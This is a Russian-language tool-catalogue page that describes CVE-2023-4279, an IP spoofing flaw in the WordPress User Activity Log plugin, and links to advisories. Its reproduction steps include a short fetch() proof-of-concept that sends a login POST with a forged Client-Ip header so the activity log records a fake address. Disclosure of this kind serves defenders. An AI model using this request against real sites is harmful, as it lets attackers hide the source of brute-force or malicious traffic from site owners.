Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-4279 — Репозиторий для уязвимости CVE-2023-4279. | Kitploit
Инструменты/GitHubGitHub/b0marek/cve-2023-4279
Анализ уязвимостейЭксплуатацияОбход IDS/IPSИнструменты для выдачи себя за другое лицоСбор информацииВеб-безопасность
GitHubb0marek/cve-2023-4279

CVE-2023-4279

Репозиторий для уязвимости CVE-2023-4279.

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Идентификатор CVE: CVE-2023-4279

Тип уязвимости: Спуфинг IP-адреса

Описание: Этот плагин извлекает IP-адреса клиентов из потенциально ненадёжных заголовков, что позволяет злоумышленнику манипулировать их значением. Это может быть использовано для скрытия источника вредоносного трафика.

Шаги для воспроизведения:

root@kitploit:~
1. In User Activity Log > Settings, enable the setting "Allow Ip Address of users to log." and save settings.

2. Run the following code in the web browser and note on the backend that the IP address has been faked.

await fetch("/wp-login.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
    "Client-Ip": "8.8.8.8",
  },
  "body": "log=USERNAME&pwd=PASSWORD",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
}); 

Ссылки:

  1. https://wpscan.com/vulnerability/2bd2579e-b383-4d12-b207-6fc32cfb82bc
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4279
  3. https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-activity-log/user-activity-log-166-ip-address-spoofing
Скачать инструмент